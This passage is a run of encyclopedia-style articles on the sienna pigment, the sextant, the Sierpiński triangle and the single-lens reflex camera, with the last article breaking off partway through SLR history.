Sienna (from the Italian terra di Siena, meaning "Earth of Siena") is an earth pigment containing iron oxide and manganese oxide. In its natural state, it is yellowish brown, and it is called raw sienna. When heated, it becomes a reddish brown, and it is called burnt sienna. It takes its name from the city-state of Siena, where it was produced during the Renaissance. Along with ochre and umber, it was one of the first pigments to be used by humans, and is found in many cave paintings. Since the Renaissance, it has been one of the brown pigments most widely used by artists. The first recorded use of sienna as a color name in English was in 1760. The normalized color coordinates for sienna are identical to kobe, first recorded as a color name in English in 1924. Earth colors Like the other earth colors, such as yellow ochre and umber, sienna is a clay which is partially composed of iron oxides. In the case of sienna, the most prevalent iron oxides are limonite (which in its natural state has a yellowish color) and goethite. In addition to iron oxides, natural or raw sienna also contains manganese oxide, which makes it darker than ochre. Aluminum oxides have also been found in the soil at very low levels. When heated, the limonite and goethite are dehydrated and turn partially to hematite, which gives the pigment a reddish-brown color. Sienna is lighter in shade than raw umber, which is also a clay with iron oxide but has a significantly higher content of manganese (5 to 20 percent), making it greenish brown or dark brown in color. When heated, raw umber becomes burnt umber, a very dark brown. History The pigment sienna was known and used in its natural form by the ancient Romans. It was mined near Arcidosso (formerly under Sienese control, now in the province of Grosseto) on Monte Amiata in southern Tuscany. It was called terra rossa (red earth), terra gialla (yellow earth), or terra di Siena. In the Middle Ages the sienna pigments were used by artists such as Duccio di Buoninsegna and other painters who lived and worked in and around the Republic of Siena. Duccio painted with earth pigments from the late 13th century until his death in the early 14th century. During the Renaissance, Giorgio Vasari made note of the pigment under the name terra rossa. Along with umber and yellow ochre, sienna became one of the standard browns used by artists from the 16th to 19th centuries, including Caravaggio (1571–1610) and Rembrandt (1606–1669), who used all three earth colors in his palette. Cross sections of Rembrandt's works, analyzed by X-ray and infrared imaging, reveal that he used variations of sienna to prime his paintings. This was especially true of some of his later works. Although these artists are known to have used sienna and its variations in their works, scholars have pointed out that the pigment was not commonly referenced by name in European sources until the mid-eighteenth century. By the 1940s, the traditional Italian sources of the pigment were nearly exhausted. Much of today's sienna production is carried out on the Italian islands of Sardinia and Sicily, while other major deposits are found in the Appalachian Mountains, where the pigment is often found alongside the region's iron deposits. It is also still produced in the French Ardennes, in the small town of Bonne Fontaine near Ecordal. Notably, the chemical composition of the umbers produced in France is distinctly different from that of the original siennas.
In the 20th century, pigments began to be produced using synthetic iron oxide rather than natural deposits. The labels on paint tubes indicate whether they contain natural or synthetic ingredients: PY-43 indicates natural raw sienna, while PR-102 indicates natural burnt sienna. Historical preparation Historically, the pigment was prepared by taking lumps of earth and placing them into a fire, using either a crucible or a shovel, in order to induce the necessary chemical reaction. In some seventeenth-century accounts, the lumps of earth are supposed to be pulverized, or at least broken down into smaller pieces, first. However, the instructions from the time period are inconsistent. Furthermore, the amount of time for which the pigment is heated depends on what the artist preparing it desires; generally, a longer exposure to heat leads to a deeper red hue. Shades and variations Sienna varies slightly in shade and hue based on the chemical composition of the soil and on the temperature and length of time of preparation. A higher proportion of iron oxide in the soil leads to a deeper red pigment. There is no single agreed standard for the color of sienna, and the name is used today for a wide variety of hues and shades. They vary by country and color list, and there are many proprietary variations offered by paint companies; one commonly cited variation comes from the ISCC-NBS color list. Raw sienna Raw sienna is a yellowish-brown natural earth pigment, composed primarily of iron oxide hydroxide. It contains a large quantity of iron oxide and a small quantity (about five percent) of manganese oxide. This kind of pigment is known as yellow ochre, yellow earth, limonite, or terra gialla. The pigment name for natural raw sienna from the Color Index International, shown on the labels of oil paints, is PY-43. A variation of raw sienna appears in the Italian Ferrario color list of 1919. Burnt sienna Burnt sienna contains a large proportion of anhydrous iron oxide. It is made by heating raw sienna, which dehydrates the iron oxide, changing it partially to hematite and giving it a rich reddish-brown color. The pigment is also known as red earth, red ochre, and terra rossa. On the Color Index International, the pigment is known as PR-102; a version of it also appears in the Italian Ferrario 1919 color list. The first recorded use of burnt sienna as a color name in English was in 1853. Burnt sienna pigment (Maerz and Paul) Another variation of burnt sienna is given in Maerz and Paul's A Dictionary of Color of 1930. It is considerably lighter than most other versions of burnt sienna, being a mix of burnt orange and raw sienna. Dark sienna (ISCC-NBS) A dark sienna variation appears in the ISCC-NBS color list; a similar dark sienna paint was frequently used on Bob Ross's TV show, The Joy of Painting. Sienna (X11 color) The web color sienna is defined by the list of X11 colors used in web browsers and web design as the hex triplet #A0522D.
Physical sciences
Minerals
Earth science
29588
https://en.wikipedia.org/wiki/Sextant
Sextant
A sextant is a doubly reflecting navigation instrument that measures the angular distance between two visible objects. The primary use of a sextant is to measure the angle between an astronomical object and the horizon for the purposes of celestial navigation. The estimation of this angle, the altitude, is known as sighting or shooting the object, or taking a sight. The angle, and the time when it was measured, can be used to calculate a position line on a nautical or aeronautical chart—for example, sighting the Sun at noon or Polaris at night (in the Northern Hemisphere) to estimate latitude (with sight reduction). Sighting the height of a landmark can give a measure of distance off and, held horizontally, a sextant can measure angles between objects for a position on a chart. A sextant can also be used to measure the lunar distance between the moon and another celestial object (such as a star or planet) in order to determine Greenwich Mean Time and hence longitude. The principle of the instrument was first implemented around 1731 by John Hadley (1682–1744) and Thomas Godfrey (1704–1749), but it was also found later in the unpublished writings of Isaac Newton (1643–1727). In 1922, it was modified for aeronautical navigation by the Portuguese navigator and naval officer Gago Coutinho. Navigational sextants Like the Davis quadrant, the sextant allows celestial objects to be measured relative to the horizon, rather than relative to the instrument. This allows excellent precision. Also, unlike the backstaff, the sextant allows direct observations of stars. This permits the use of the sextant at night, when a backstaff is difficult to use. For solar observations, filters allow direct observation of the Sun. Since the measurement is relative to the horizon, the measuring pointer is a beam of light that reaches to the horizon. The measurement is thus limited by the angular accuracy of the instrument and not the sine error of the length of an alidade, as it is in a mariner's astrolabe or similar older instrument. A sextant does not require a completely steady aim, because it measures a relative angle. For example, when a sextant is used on a moving ship, the image of both horizon and celestial object will move around in the field of view. However, the relative position of the two images will remain steady, and as long as the user can determine when the celestial object touches the horizon, the accuracy of the measurement will remain high compared to the magnitude of the movement. The sextant is not dependent upon electricity (unlike many forms of modern navigation) or any human-controlled signals (such as GPS). For these reasons it is considered to be an eminently practical back-up navigation tool for ships. Design The frame of a sextant is in the shape of a sector which is approximately one sixth of a circle (60°), hence its name (sextāns, sextantis is the Latin word for "one sixth"). Both smaller and larger instruments are (or were) in use: the octant, quintant (or pentant) and the (doubly reflecting) quadrant span sectors of approximately one eighth of a circle (45°), one fifth of a circle (72°) and one quarter of a circle (90°), respectively. All of these instruments may be termed "sextants". Attached to the frame are the "horizon mirror", an index arm which moves the index mirror, a sighting telescope, Sun shades, a graduated scale and a micrometer drum gauge for accurate measurements. The scale must be graduated so that the marked degree divisions register twice the angle through which the index arm turns.
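This doubling can be checked with a small two-dimensional reflection model. The sketch below is illustrative only (the starting mirror angle of 100 degrees is arbitrary, and the function name is invented); it rotates the mirror and reports how far the reflected ray swings:

import math

def reflect_direction(ray_deg, normal_deg):
    # Reflect a 2-D ray, given by its direction angle, off a mirror whose
    # unit normal points along normal_deg; returns the reflected direction.
    r, n = math.radians(ray_deg), math.radians(normal_deg)
    dx, dy = math.cos(r), math.sin(r)
    nx, ny = math.cos(n), math.sin(n)
    dot = dx * nx + dy * ny
    rx, ry = dx - 2 * dot * nx, dy - 2 * dot * ny
    return math.degrees(math.atan2(ry, rx)) % 360

# Turning the mirror by 10 and then 20 degrees swings the reflected ray
# through 20 and 40 degrees: hence the arc is engraved with doubled values.
base = reflect_direction(0, 100)
for turn in (10, 20):
    print(turn, round((reflect_direction(0, 100 + turn) - base) % 360, 6))

The geometric argument for the same result, using the equality of the angles of incidence and reflection, follows below.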
The scales of the octant, sextant, quintant and quadrant are graduated from below zero to 90°, 120°, 140° and 180° respectively. For example, the sextant illustrated has a scale graduated from −10° to 142°, which makes it basically a quintant: the frame is a sector of a circle subtending an angle of 76° at the pivot of the index arm. The necessity for the doubled scale reading follows from consideration of the relations of the fixed ray (between the mirrors), the object ray (from the sighted object) and the direction of the normal (the perpendicular) to the index mirror. When the index arm moves by an angle, say 20°, the angle between the fixed ray and the normal also increases by 20°. But the angle of incidence equals the angle of reflection, so the angle between the object ray and the normal must also increase by 20°. The angle between the fixed ray and the object ray must therefore increase by 40°. This is the case shown in the graphic.
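This doubled-angle behaviour can be stated compactly in equation form. The restatement below is an editorial illustration that follows directly from the law of reflection as described above, and is not text from the original article: if the index mirror (and hence its normal) turns by an angle θ, the direction of the reflected ray turns by 2θ.

```latex
% The mirror (and its normal) rotates by \theta; the angle of incidence and
% the angle of reflection each change by \theta, so the reflected ray turns by 2\theta:
\Delta_{\text{object ray}}
  \;=\; \underbrace{\Delta_{\text{incidence}}}_{\theta}
  \;+\; \underbrace{\Delta_{\text{reflection}}}_{\theta}
  \;=\; 2\theta,
\qquad
\theta = 20^{\circ} \;\Rightarrow\; 2\theta = 40^{\circ}.
```

This is why the arc is graduated at twice the mechanical angle through which the index arm actually turns.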
There are two types of horizon mirrors on the market today. Both types give good results. Traditional sextants have a half-horizon mirror, which divides the field of view in two. On one side, there is a view of the horizon; on the other side, a view of the celestial object. The advantage of this type is that both the horizon and celestial object are bright and as clear as possible. This is superior at night and in haze, when the horizon and/or a star being sighted can be difficult to see. However, one has to sweep the celestial object to ensure that the lowest limb of the celestial object touches the horizon. Whole-horizon sextants use a half-silvered horizon mirror to provide a full view of the horizon. This makes it easy to see when the bottom limb of a celestial object touches the horizon. Since most sights are of the Sun or Moon, and haze is rare without overcast, the low-light advantages of the half-horizon mirror are rarely important in practice. In both types, larger mirrors give a larger field of view, and thus make it easier to find a celestial object. Modern sextants often have 5 cm or larger mirrors, while 19th-century sextants rarely had a mirror larger than 2.5 cm (one inch). In large part, this is because precision flat mirrors have grown less expensive to manufacture and to silver.

An artificial horizon is useful when the natural horizon is invisible, as occurs in fog, on moonless nights, in a calm, when sighting through a window or on land surrounded by trees or buildings. There are two common designs of artificial horizon. An artificial horizon can consist simply of a pool of water shielded from the wind, allowing the user to measure the angular distance between the body and its reflection and divide by two. Another design allows a fluid-filled tube with a bubble to be mounted directly on the sextant. Most sextants also have filters for use when viewing the Sun and for reducing the effects of haze. The filters usually consist of a series of progressively darker glasses that can be used singly or in combination to reduce haze and the Sun's brightness. However, sextants with adjustable polarizing filters have also been manufactured, in which the degree of darkness is adjusted by twisting the frame of the filter. Most sextants mount a 1- or 3-power monocular for viewing. Many users prefer a simple sighting tube, which has a wider, brighter field of view and is easier to use at night. Some navigators mount a light-amplifying monocular to help see the horizon on moonless nights. Others prefer to use a lit artificial horizon.

Professional sextants use a click-stop degree measure and a worm adjustment that reads to a minute, 1/60 of a degree. Most sextants also include a vernier on the worm dial that reads to 0.1 minute. Since 1 minute of error corresponds to about a nautical mile, the best possible accuracy of celestial navigation is about 0.1 nautical miles. At sea, results within several nautical miles, well within visual range, are acceptable. A highly skilled and experienced navigator can determine position to an accuracy of about 0.25 nautical miles. A change in temperature can warp the arc, creating inaccuracies. Many navigators purchase weatherproof cases so that their sextant can be placed outside the cabin to come to equilibrium with outside temperatures. The standard frame designs (see illustration) are supposed to equalise differential angular error from temperature changes. The handle is separated from the arc and frame so that body heat does not warp the frame. Sextants for tropical use are often painted white to reflect sunlight and remain relatively cool. High-precision sextants have an invar (a special low-expansion steel) frame and arc. Some scientific sextants have been constructed of quartz or ceramics with even lower expansions. Many commercial sextants use low-expansion brass or aluminium. Brass is lower-expansion than aluminium, but aluminium sextants are lighter and less tiring to use. Some say they are more accurate because one's hand trembles less. Solid brass frame sextants are less susceptible to wobbling in high winds or when the vessel is working in heavy seas, but as noted are substantially heavier. Sextants with aluminium frames and brass arcs have also been manufactured. Essentially, a sextant is intensely personal to each navigator, and they will choose whichever model has the features which suit them best.

Aircraft sextants are now out of production, but had special features. Most had artificial horizons to permit taking a sight through a flush overhead window. Some also had mechanical averagers to make hundreds of measurements per sight to compensate for random accelerations in the artificial horizon's fluid. Older aircraft sextants had two visual paths, one standard and one designed for use in open-cockpit aircraft, which let the user sight from directly over the sextant held in the lap. More modern aircraft sextants were periscopic, with only a small projection above the fuselage. With these, the navigator pre-computed their sight and then noted the difference between the observed and predicted height of the body to determine their position.

Taking a sight
A sight (or measure) of the angle between the Sun, a star, or a planet, and the horizon is done with the 'star telescope' fitted to the sextant, using the visible horizon. On a vessel at sea, even on misty days, a sight may be taken from a low height above the water to give a more definite, better horizon. Navigators hold the sextant by its handle in the right hand, avoiding touching the arc with the fingers. For a Sun sight, filters are used to overcome the glare: "shades" covering both the index mirror and the horizon mirror, designed to prevent eye damage. Initially, with the index bar set to zero and the shades covering both mirrors, the sextant is aimed at the Sun until it can be viewed on both mirrors through the telescope, then lowered vertically until the portion of the horizon directly below it is viewed on both mirrors. It is necessary to flip back the horizon mirror shade to be able to see the horizon more clearly on it.
The index bar is then released (either by releasing a clamping screw, or on modern instruments, using the quick-release button) and moved towards higher values of the scale until the image of the Sun reappears on the index mirror and can be aligned to about the level of the horizon on the horizon mirror. Then the fine adjustment screw on the end of the index bar is turned until the bottom curve (the lower limb) of the Sun just touches the horizon. "Swinging" the sextant about the axis of the telescope ensures that the reading is being taken with the instrument held vertically. The angle of the sight is then read from the scale on the arc, making use of the micrometer or vernier scale provided. The exact time of the sight must also be noted simultaneously, and the height of the eye above sea level recorded.

An alternative method is to estimate the current altitude (angle) of the Sun from navigation tables, then set the index bar to that angle on the arc, apply suitable shades only to the index mirror, and point the instrument directly at the horizon, sweeping it from side to side until a flash of the Sun's rays is seen in the telescope. Fine adjustments are then made as above. This method is less likely to be successful for sighting stars and planets. Star and planet sights are normally taken during nautical twilight at dawn or dusk, while both the heavenly bodies and the sea horizon are visible. There is no need to use shades or to distinguish the lower limb, as the body appears as a mere point in the telescope. The Moon can be sighted, but it appears to move very fast, appears to have different sizes at different times, and sometimes only the lower or upper limb can be distinguished due to its phase. After a sight is taken, it is reduced to a position by means of one of several mathematical procedures. The simplest sight reduction is to draw the equal-altitude circle of the sighted celestial object on a globe. The intersection of that circle with a dead-reckoning track, or another sighting, gives a more precise location.

Sextants can be used very accurately to measure other visible angles, for example between one heavenly body and another and between landmarks ashore. Used horizontally, a sextant can measure the apparent angle between two landmarks such as a lighthouse and a church spire, which can then be used to find the distance off or out to sea (provided the distance between the two landmarks is known). Used vertically, a measurement of the angle between the lantern of a lighthouse of known height and the sea level at its base can also be used for distance off.
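As a worked sketch of the vertical-angle method just described, the following short Python example computes distance off by simple trigonometry. It is an editorial illustration with hypothetical numbers, not an example from the original text:

```python
import math

def distance_off(object_height_m: float, vertical_angle_deg: float) -> float:
    """Distance to an object of known height from the vertical angle it
    subtends above sea level, using d = h / tan(angle).

    Neglects Earth curvature and refraction, which is reasonable at the
    short ranges over which a lighthouse base is visible.
    """
    return object_height_m / math.tan(math.radians(vertical_angle_deg))

# Hypothetical example: a 40 m lighthouse lantern subtending 0.5 degrees
d = distance_off(40.0, 0.5)
print(f"Distance off: {d:.0f} m ({d / 1852:.2f} nautical miles)")
# -> roughly 4584 m, about 2.5 nautical miles
```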
Adjustment
Due to the sensitivity of the instrument, it is easy to knock the mirrors out of adjustment. For this reason, a sextant should be checked frequently for errors and adjusted accordingly. There are four errors that can be adjusted by the navigator, and they should be removed in the following order.

Perpendicularity error: This is when the index mirror is not perpendicular to the frame of the sextant. To test for this, place the index arm at about 60° on the arc, hold the sextant horizontally with the arc away from you at arm's length, and look into the index mirror. The arc of the sextant should appear to continue unbroken into the mirror. If there is an error, the two views will appear to be broken. Adjust the mirror until the reflection and the direct view of the arc appear to be continuous.

Side error: This occurs when the horizon glass/mirror is not perpendicular to the plane of the instrument. To test for this, first zero the index arm, then observe a star through the sextant. Then rotate the tangent screw back and forth so that the reflected image passes alternately above and below the direct view. If, in changing from one position to another, the reflected image passes directly over the unreflected image, no side error exists. If it passes to one side, side error exists. Alternatively, the user can hold the sextant on its side and observe the horizon to check the sextant during the day. If there are two horizons, there is side error. In both cases, adjust the horizon glass/mirror until, respectively, the star or horizon images merge into one. Side error is generally inconsequential for observations and can be ignored or reduced to a level that is merely inconvenient.

Collimation error: This is when the telescope or monocular is not parallel to the plane of the sextant. To check for this, observe two stars 90° or more apart. Bring the two stars into coincidence either to the left or the right of the field of view. Move the sextant slightly so that the stars move to the other side of the field of view. If they separate, there is collimation error. As modern sextants rarely use adjustable telescopes, they do not need to be corrected for collimation error.

Index error: This occurs when the index and horizon mirrors are not parallel to each other when the index arm is set to zero. To test for index error, zero the index arm and observe the horizon. If the reflected and direct images of the horizon are in line, there is no index error. If one is above the other, adjust the index mirror until the two horizons merge. Alternatively, the same procedure can be done at night using a star or the Moon instead of the horizon.
Technology
Navigation
null
29638
https://en.wikipedia.org/wiki/Sierpi%C5%84ski%20triangle
Sierpiński triangle
The Sierpiński triangle, also called the Sierpiński gasket or Sierpiński sieve, is a fractal with the overall shape of an equilateral triangle, subdivided recursively into smaller equilateral triangles. Originally constructed as a curve, this is one of the basic examples of self-similar sets; that is, it is a mathematically generated pattern reproducible at any magnification or reduction. It is named after the Polish mathematician Wacław Sierpiński but appeared as a decorative pattern many centuries before the work of Sierpiński.

Constructions
There are many different ways of constructing the Sierpiński triangle.

Removing triangles
The Sierpiński triangle may be constructed from an equilateral triangle by repeated removal of triangular subsets: (1) Start with an equilateral triangle. (2) Subdivide it into four smaller congruent equilateral triangles and remove the central triangle. (3) Repeat step 2 with each of the remaining smaller triangles infinitely. Each removed triangle (a trema) is topologically an open set. This process of recursively removing triangles is an example of a finite subdivision rule.

Shrinking and duplication
The same sequence of shapes, converging to the Sierpiński triangle, can alternatively be generated by the following steps: (1) Start with any triangle in a plane (any closed, bounded region in the plane will actually work). The canonical Sierpiński triangle uses an equilateral triangle with a base parallel to the horizontal axis (first image). (2) Shrink the triangle to half height and half width, make three copies, and position the three shrunken triangles so that each triangle touches the two other triangles at a corner (image 2). Note the emergence of the central hole: the three shrunken triangles can between them cover only three quarters of the area of the original. (Holes are an important feature of Sierpiński's triangle.) (3) Repeat step 2 with each of the smaller triangles (image 3 and so on). This infinite process is not dependent upon the starting shape being a triangle; a triangle is just clearer that way. The first few steps starting, for example, from a square also tend towards a Sierpiński triangle. Michael Barnsley used an image of a fish to illustrate this in his paper "V-variable fractals and superfractals." The actual fractal is what would be obtained after an infinite number of iterations. More formally, one describes it in terms of functions on closed sets of points. If we let dA denote the dilation by a factor of 1/2 about a point A, then the Sierpiński triangle with corners A, B, and C is the fixed set of the transformation dA ∪ dB ∪ dC. This is an attractive fixed set, so that when the operation is applied to any other set repeatedly, the images converge on the Sierpiński triangle. This is what is happening with the triangle above, but any other set would suffice.

Chaos game
If one takes a point and applies each of the transformations dA, dB, and dC to it randomly, the resulting points will be dense in the Sierpiński triangle, so the following algorithm will again generate arbitrarily close approximations to it: (1) Start by labeling p1, p2 and p3 as the corners of the Sierpiński triangle, and pick a random point v1. (2) Set vn+1 = ½(vn + prn), where rn is a random number 1, 2 or 3. (3) Draw the points v1 to v∞. If the first point v1 was a point on the Sierpiński triangle, then all the points vn lie on the Sierpiński triangle. If the first point v1 to lie within the perimeter of the triangle is not a point on the Sierpiński triangle, none of the points vn will lie on the Sierpiński triangle; however, they will converge on the triangle. If v1 is outside the triangle, the only way vn will land on the actual triangle is if vn is on what would be part of the triangle if the triangle were infinitely large. Or more simply: (1) Take three points in a plane to form a triangle. (2) Randomly select any point inside the triangle and consider that your current position. (3) Randomly select any one of the three vertex points. (4) Move half the distance from your current position to the selected vertex. (5) Plot the current position. (6) Repeat from step 3. This method is also called the chaos game, and is an example of an iterated function system. You can start from any point outside or inside the triangle, and it will eventually form the Sierpiński gasket with a few leftover points (if the starting point lies on the outline of the triangle, there are no leftover points). With pencil and paper, a brief outline is formed after placing approximately one hundred points, and detail begins to appear after a few hundred.
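The chaos game translates almost line for line into code. The following minimal Python sketch is an editorial illustration of the procedure just described; the corner coordinates and point count are arbitrary choices, and matplotlib is assumed for plotting:

```python
import random
import matplotlib.pyplot as plt

# Corners of the triangle (an arbitrary equilateral choice)
corners = [(0.0, 0.0), (1.0, 0.0), (0.5, 3 ** 0.5 / 2)]

x, y = 0.25, 0.25  # any starting point inside the triangle
xs, ys = [], []

for _ in range(50_000):
    cx, cy = random.choice(corners)    # pick one of the three vertices at random
    x, y = (x + cx) / 2, (y + cy) / 2  # move halfway towards it
    xs.append(x)
    ys.append(y)

plt.scatter(xs, ys, s=0.1, marker='.')
plt.gca().set_aspect('equal')
plt.show()
```

After a few thousand iterations the plotted points visibly trace the gasket, matching the pencil-and-paper behaviour noted above.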
Arrowhead construction of Sierpiński gasket
Another construction for the Sierpiński gasket shows that it can be constructed as a curve in the plane. It is formed by a process of repeated modification of simpler curves, analogous to the construction of the Koch snowflake: (1) Start with a single line segment in the plane. (2) Repeatedly replace each line segment of the curve with three shorter segments, forming 120° angles at each junction between two consecutive segments, with the first and last segments of the curve either parallel to the original line segment or forming a 60° angle with it. At every iteration, this construction gives a continuous curve. In the limit, these approach a curve that traces out the Sierpiński triangle by a single continuous directed (infinitely wiggly) path, which is called the Sierpiński arrowhead. In fact, the aim of Sierpiński's original article in 1915 was to show an example of a curve (a Cantorian curve), as the title of the article itself declares.

Cellular automata
The Sierpiński triangle also appears in certain cellular automata (such as Rule 90), including those relating to Conway's Game of Life. For instance, the Life-like cellular automaton B1/S12, when applied to a single cell, will generate four approximations of the Sierpiński triangle. A very long, one-cell-thick line in standard Life will create two mirrored Sierpiński triangles. The time-space diagram of a replicator pattern in a cellular automaton also often resembles a Sierpiński triangle, such as that of the common replicator in HighLife. The Sierpiński triangle can also be found in the Ulam-Warburton automaton and the Hex-Ulam-Warburton automaton.

Pascal's triangle
If one takes Pascal's triangle with 2^n rows and colors the even numbers white and the odd numbers black, the result is an approximation to the Sierpiński triangle. More precisely, the limit as n approaches infinity of this parity-colored 2^n-row Pascal triangle is the Sierpiński triangle. As the proportion of black numbers tends to zero with increasing n, a corollary is that the proportion of odd binomial coefficients tends to zero as n tends to infinity.
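The parity coloring above can be computed without building the triangle of numbers at all. By Lucas's theorem (a standard fact not spelled out in the text above), the binomial coefficient C(n, k) is odd exactly when the binary digits of k are a subset of those of n, which gives a one-line test. The following Python sketch, an editorial illustration, prints the first 2^5 rows of the pattern:

```python
ROWS = 2 ** 5  # 32 rows; any power of two shows the pattern cleanly

for n in range(ROWS):
    # C(n, k) is odd iff (n & k) == k, i.e. k's binary digits are a subset of n's
    row = ' '.join('*' if (n & k) == k else ' ' for k in range(n + 1))
    print(row.center(2 * ROWS))
```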
Towers of Hanoi
The Towers of Hanoi puzzle involves moving disks of different sizes between three pegs, maintaining the property that no disk is ever placed on top of a smaller disk. The states of an n-disk puzzle, and the allowable moves from one state to another, form an undirected graph, the Hanoi graph, that can be represented geometrically as the intersection graph of the set of triangles remaining after the nth step in the construction of the Sierpiński triangle. Thus, in the limit as n goes to infinity, this sequence of graphs can be interpreted as a discrete analogue of the Sierpiński triangle.

Properties
For an integer number of dimensions d, when doubling a side of an object, 2^d copies of it are created, i.e. 2 copies for a 1-dimensional object, 4 copies for a 2-dimensional object and 8 copies for a 3-dimensional object. For the Sierpiński triangle, doubling its side creates 3 copies of itself. Thus the Sierpiński triangle has Hausdorff dimension log 3/log 2 ≈ 1.585, which follows from solving 2^d = 3 for d. The area of a Sierpiński triangle is zero (in Lebesgue measure). The area remaining after each iteration is 3/4 of the area from the previous iteration, and an infinite number of iterations results in an area approaching zero. The points of a Sierpiński triangle have a simple characterization in barycentric coordinates. If a point has barycentric coordinates (u, v, w), expressed as binary numerals, then the point is in Sierpiński's triangle if and only if ui + vi + wi = 1 for every binary place i; that is, in each binary place exactly one of the three coordinates has the digit 1.

Generalization to other moduli
A generalization of the Sierpiński triangle can also be generated using Pascal's triangle if a different modulus P is used. Iteration n can be generated by taking a Pascal's triangle with P^n rows and coloring numbers by their value modulo P. As n approaches infinity, a fractal is generated. The same fractal can be achieved by dividing a triangle into a tessellation of P^2 similar triangles and removing the triangles that are upside-down from the original, then iterating this step with each smaller triangle. Conversely, the fractal can also be generated by beginning with a triangle and duplicating it and arranging P(P + 1)/2 of the new figures in the same orientation into a larger similar triangle with the vertices of the previous figures touching, then iterating that step.

Analogues in higher dimensions
The Sierpiński tetrahedron or tetrix is the three-dimensional analogue of the Sierpiński triangle, formed by repeatedly shrinking a regular tetrahedron to one half its original height, putting together four copies of this tetrahedron with corners touching, and then repeating the process. A tetrix constructed from an initial tetrahedron of side length L has the property that the total surface area remains constant with each iteration. The initial surface area of the (iteration-0) tetrahedron of side length L is √3 L^2. The next iteration consists of four copies with side length L/2, so the total area is 4 · √3 (L/2)^2 = √3 L^2 again. Subsequent iterations again quadruple the number of copies and halve the side length, preserving the overall area. Meanwhile, the volume of the construction is halved at every step and therefore approaches zero. The limit of this process has neither volume nor surface but, like the Sierpiński gasket, is an intricately connected curve. Its Hausdorff dimension is log 4/log 2 = 2; here "log" denotes the natural logarithm, the numerator is the logarithm of the number of copies of the shape formed from each copy of the previous iteration, and the denominator is the logarithm of the factor by which these copies are scaled down from the previous iteration. If all points are projected onto a plane that is parallel to two of the outer edges, they exactly fill a square of side length L/√2 without overlap.
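The surface-area bookkeeping above can be written out as a short worked check. This is an editorial restatement of the text's claim, using the standard formulas for the surface area and volume of a regular tetrahedron:

```latex
% A regular tetrahedron of side s has 4 equilateral faces:
A(s) = 4 \cdot \frac{\sqrt{3}}{4}\, s^{2} = \sqrt{3}\, s^{2}.
% After k iterations there are 4^k tetrahedra of side L/2^k, so the area is constant:
A_k = 4^{k} \cdot \sqrt{3} \left( \frac{L}{2^{k}} \right)^{2} = \sqrt{3}\, L^{2} = A_0,
% while the total volume is halved at each step and tends to zero:
V_k = 4^{k} \cdot \frac{(L/2^{k})^{3}}{6\sqrt{2}}
    = \left( \tfrac{1}{2} \right)^{k} \frac{L^{3}}{6\sqrt{2}}
    \;\xrightarrow[k \to \infty]{}\; 0.
```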
History
Wacław Sierpiński described the Sierpiński triangle in 1915. However, similar patterns appear already as a common motif of 13th-century Cosmatesque inlay stonework. The Apollonian gasket, named for Apollonius of Perga (3rd century BC), was first described by Gottfried Leibniz (17th century) and is a curved precursor of the 20th-century Sierpiński triangle.

Etymology
The usage of the word "gasket" to refer to the Sierpiński triangle alludes to the gaskets found in motors, which sometimes feature a series of holes of decreasing size, similar to the fractal. This usage was coined by Benoit Mandelbrot, who thought the fractal looked similar to "the part that prevents leaks in motors".
Mathematics
Other
null
29648
https://en.wikipedia.org/wiki/Single-lens%20reflex%20camera
Single-lens reflex camera
A single-lens reflex camera (SLR) is a camera that typically uses a mirror and prism system (hence "reflex", from the mirror's reflection) that permits the photographer to view through the lens and see exactly what will be captured. With twin-lens reflex and rangefinder cameras, the viewed image could be significantly different from the final image. When the shutter button is pressed on most SLRs, the mirror flips out of the light path, allowing light to pass through to the film or image sensor so the image can be captured.

History
Until the development of the SLR, all cameras with viewfinders had two optical light paths: one through the lens to the film, and another positioned above (TLR or twin-lens reflex) or to the side (rangefinder). Because the viewfinder and the film lens cannot share the same optical path, the viewing lens is aimed to intersect with the film lens at a fixed point somewhere in front of the camera. This is not problematic for pictures taken at a middle or longer distance, but parallax causes framing errors in close-up shots. Moreover, it is not easy to focus the lens of a fast reflex camera when it is opened to wider apertures (such as in low light or while using low-speed film).

Most SLR cameras permit upright and laterally correct viewing through use of a roof pentaprism situated in the optical path between the reflex mirror and viewfinder. Light, which comes both horizontally and vertically inverted after passing through the lens, is reflected upwards by the reflex mirror into the pentaprism, where it is reflected twice to correct the inversions caused by the lens and align the image with the viewfinder. When the shutter is released, the mirror moves out of the light path, and the light shines directly onto the film (or, in the case of a DSLR, the CCD or CMOS imaging sensor). Exceptions to the moving mirror system include the Canon Pellix and Sony SLT cameras, along with several special-purpose high-speed cameras (such as the Canon EOS-1N RS), whose mirror was a fixed beam-splitting pellicle. Focus can be adjusted manually by the photographer or automatically by an autofocus system. The viewfinder can include a matte focusing screen located just above the mirror system to diffuse the light. This permits accurate viewing, composing and focusing, especially useful with interchangeable lenses.

Up until the 1990s, SLR was the most advanced photographic preview system available, but the subsequent development and refinement of digital imaging technology with an on-camera live LCD preview screen has overshadowed the SLR's popularity. Nearly all inexpensive compact digital cameras now include an LCD preview screen allowing the photographer to see what the sensor is capturing. However, the SLR remains popular in high-end and professional cameras because SLRs are system cameras with interchangeable parts, allowing customization. They also have far less shutter lag, allowing photographs to be timed more precisely. Also, the pixel resolution, contrast ratio, refresh rate, and color gamut of an LCD preview screen cannot compete with the clarity and shadow detail of a direct-viewed optical SLR viewfinder.

Large-format SLR cameras were probably first marketed with the introduction of C.R. Smith's Monocular Duplex (U.S., 1884). SLRs for smaller exposure formats were launched in the 1920s by several camera makers. The first 35 mm SLR available to the mass market, Leica's PLOOT reflex housing along with a 200 mm f/4.5 lens paired to a 35 mm rangefinder camera body, debuted in 1935.
The Soviet Спорт ("Sport"), also using a 24 mm × 36 mm image size, was prototyped in 1934 and went to market in 1937. K. Nüchterlein's Kine Exakta (Germany, 1936) was the first integrated 35 mm SLR to enter the market. Additional Exakta models, all with waist-level finders, were produced up to and during World War II. Another ancestor of the modern SLR camera was the Swiss-made Alpa, which was innovative and influenced later Japanese cameras. The first eye-level SLR viewfinder was patented in Hungary on August 23, 1943, by Jenő Dulovits, who then designed the first 35 mm camera with one, the Duflex, which used a system of mirrors to provide a laterally correct, upright image in the eye-level viewfinder. The Duflex, which went into serial production in 1948, was also the world's first SLR with an instant-return (a.k.a. autoreturn) mirror. The first commercially produced SLR that employed a roof pentaprism was the Italian Rectaflex A.1000, shown in full working condition at the Milan fair in April 1948 and produced from September of the same year, thus being on the market one year before the East German Zeiss Ikon VEB Contax S, announced on May 20, 1949, and produced from September. The Japanese adopted and further developed the SLR. In 1952, Asahi developed the Asahiflex and in 1954, the Asahiflex IIB. In 1957, the Asahi Pentax combined the fixed pentaprism and the right-hand thumb wind 